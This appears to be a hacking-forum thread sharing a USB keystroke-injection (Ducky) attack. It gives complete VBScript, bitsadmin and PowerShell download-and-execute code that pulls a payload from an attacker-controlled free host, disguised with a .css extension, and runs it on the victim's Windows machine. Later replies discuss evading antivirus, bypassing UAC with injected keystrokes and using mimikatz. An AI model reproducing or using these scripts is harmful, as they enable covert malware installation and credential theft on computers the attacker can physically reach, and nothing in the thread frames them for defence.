Fast payload download and install script

[Hashirama]

So, this script downloads VB script via cmd and witch downloads payload.exe.

To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css. WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work!

VB script:

SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe"
Function SaveWebBinary(strUrl, strFile) 'As Boolean
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Const ForWriting = 2
Dim web, varByteArray, strData, strBuffer, lngCounter, ado
    On Error Resume Next
    'Download the file with any available object
    Err.Clear
    Set web = Nothing
    Set web = CreateObject("WinHttp.WinHttpRequest.5.1")
    If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest")
    If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP")
    If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP")
    web.Open "GET", strURL, False
    web.Send
    If Err.Number <> 0 Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    If web.Status <> "200" Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    varByteArray = web.ResponseBody
    Set web = Nothing
    'Now save the file with any available method
    On Error Resume Next
    Set ado = Nothing
    Set ado = CreateObject("ADODB.Stream")
    If ado Is Nothing Then
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set ts = fs.OpenTextFile(strFile, ForWriting, True)
        strData = ""
        strBuffer = ""
        For lngCounter = 0 to UBound(varByteArray)
            ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
        Next
        ts.Close
    Else
        ado.Type = adTypeBinary
        ado.Open
        ado.Write varByteArray
        ado.SaveToFile strFile, adSaveCreateOverWrite
        ado.Close
    End If
    SaveWebBinary = True
End Function
wscript.sleep 5000
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"

Ducky script:

GUI r
DELAY 200
STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs
ENTER

Happy hacking!

[FlashOut]

hey seems to be nice but the vb script get detected by my AV software :(

[White Light]

Why download and use the VB script to download the end file when you can just download and execute the file directly?

[Hashirama]

hey seems to be nice but the vb script get detected by my AV software :(

What AV are you using?

[Hashirama]

Why download and use the VB script to download the end file when you can just download and execute the file directly?

Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

[White Light]

Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'

[FlashOut]

i use panda free antivirus is there any other vb script whice do the same but dont get detected?

it also usefull because you can change the download file on your webspace and you dont need to change the rubby usb inject.bin :D

[Hashirama]

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'

I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

[Hashirama]

i use panda free antivirus is there any other vb script whice do the same but dont get detected?

it also usefull because you can change the download file on your webspace and you dont need to change the rubby usb inject.bin :D

I scanned vb script on virus total, and didn't get any detections.

[FlashOut]

https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/

lol my av detects it panda :)

i thought its a bad av scanner

but on most av its clean so its useabel xD

[Hashirama]

https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/

lol my av detects it panda :)

i thought its a bad av scanner

but on most av its clean so its useabel xD

Damn, AVs are updated too fast. LoL Anyway, simple google search will get you a lot of vb scripts for downloading a file.

[White Light]

I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.

[Hashirama]

I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versAre you

Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

[White Light]

Are you sure? Because bitsadmin is on win10. Anyway does anyone knows any vb script with privs escalation or uac bypass? Tried google, tried deep web, but found nothing helpful.

I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

[Hashirama]

I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was depreciated when Windows 7 came out in favor of using powershell. As for a UAC bypass using VBS...dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow.

[White Light]

I tried simulating keystrokes and i didn't work. But the mimikatz is still working, i'm trying to implement it somehow.

The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.